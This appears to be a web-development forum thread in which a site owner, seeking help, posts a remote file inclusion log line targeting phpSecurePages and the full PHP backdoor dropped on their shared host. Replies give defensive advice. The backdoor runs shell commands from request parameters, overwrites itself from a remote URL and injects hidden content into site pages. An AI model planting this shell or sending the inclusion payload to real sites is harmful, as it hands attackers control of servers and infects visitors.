Jump to content

repeated hacking attempts


ziggy1621

Recommended Posts

I've got a site that it seems an IRC bot is attacking and writing an activeX virus after the <body> tags. I've been fighting this for weeks and here is what I have....

 

It is shared hosting, so php.ini is not available and my htaccess is limited. Register_Globals was on, today I turned it off after some extensive reading. The hacker is running code like the following found in my logs:

 

//phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php 

 

where the host its getting the file from changes each time, so blocking IP/Domains doesn't work and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses, then sometimes it creates a random file with the following code

 

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}

function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

  if (isset($_GET[$name]))
        $var = $_GET[$name];
    
    if (($var) =="")
      return  false;
      else return true;
}

function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

  if (isset($_GET["sg"]))
        $sg = $_GET["sg"]; 
        
    if (isset($_POST["gm"]))
      $g = $_POST["gm"];

    if (isset($_GET["gm"]))
        $g = $_GET["gm"];
        
        
    $path = "";
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            $pid = 0;
            $rnd = mt_rand(0, 999);
            $nm = "";
        for ($i=0; $i<3; $i++)
          {
              $ran = mt_rand(0,26);
              $sym = $alp[$ran];
              $nm = $nm.$sym;
          }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else 
    {
        $rnd = mt_rand(0, 999);
        $nm = "";
      for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
    mkdir("$tname/$cname");
    }
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        
        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }
    
    if ($j==100)
    {
      $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }
    
    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];
      
    if (isset($_GET['u']))
         $u = $_GET['u'];
         
     $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}

function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // óäàëÿåì çàâåðøàþùèå õòìë òåãè
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
  $drs = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) 
         {  
       exit();
         }
       $drs .= $fc;
    }
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }
    
    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }
    
    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }
    
    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }
    
  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }
    
    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }
    
    echo "<ok>";
    
}

Main();

?>

Any Help Appreciated... I'm dying here

Link to comment
Share on other sites

Anytime I use $_GET variables, I always check them against a whitelist contained in an array.  If its not in the array, it just outputs 'Page Error'.

 

Example:

 

www.mysite.com/index.php?action=help

 

in my code, I have:

$action = isset($_GET['action']) ? $_GET['action'] : "";
//....
$allowable_actions = array('help', 'delete');
if(!in_array($action, $allowable_actions)) die('Page Error');
// ... rest of code...

so if action does not = 'help' or 'delete' it kills the application and prevents any tampering.  There is more to do, like run $_GET superglobal through a sanitizer, but this little whitelist goes a long way.

Link to comment
Share on other sites

I hate to tell you but if he's putting a file on your server then you've been compromised.  You need to reinstall from scratch.  Period. You MIGHT get lucky with a rootkit but prolly he's got crap in your system. It could be something like the ls command for example been patched to recreate or whatever.

 

You're screwed. 

 

1. Linux or Winblow?

2. Virt domain or host domain?

3. Your server or hosted?

 

Link to comment
Share on other sites

Wipe every file you can. Fix security hole on a local test server. Re-upload.

I wouldn't advise that unless you know for sure that the server is compromised.  If he has remote inclusion turned off the hack attempt he is talking about is useless and is only showing up in logs...

 

Link to comment
Share on other sites

The phpSecurePages script (despite its' name) was setting up the cfgProgDir variable in the main file as the name of a file to be included in the setup.php file. Since register_globals and allow_url_fopen were on, this allowed the GET parameter on the end of the url to set cfgProgDir when setup.php was requested directly and external raw php code was included and executed on the server (almost as if a hacker had written this script to work this way.) The phpSecurePages script has since been patched to make sure this specific security hole has been closed, but too late for everyone who's site has been taken over.

 

Since any possible code could have been included and executed, anything could have been changed that php has access to, such as other .php files could have been modified or whole files added, any available shell() command could have been executed, or any usernames/passwords stored in php files or in a database could have been read or added to...

 

If your site is still being taken over after you have deleted the phpSecurePages script, you need to find out how it is being done. If you compare all the filenames and file contents with a good backup version and compare the contents of all databases with a good back version, you should be able to find out what has been changed. You can either remove the added/changed files or database entries or you can delete everything and restore from a good backup version.

Link to comment
Share on other sites

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.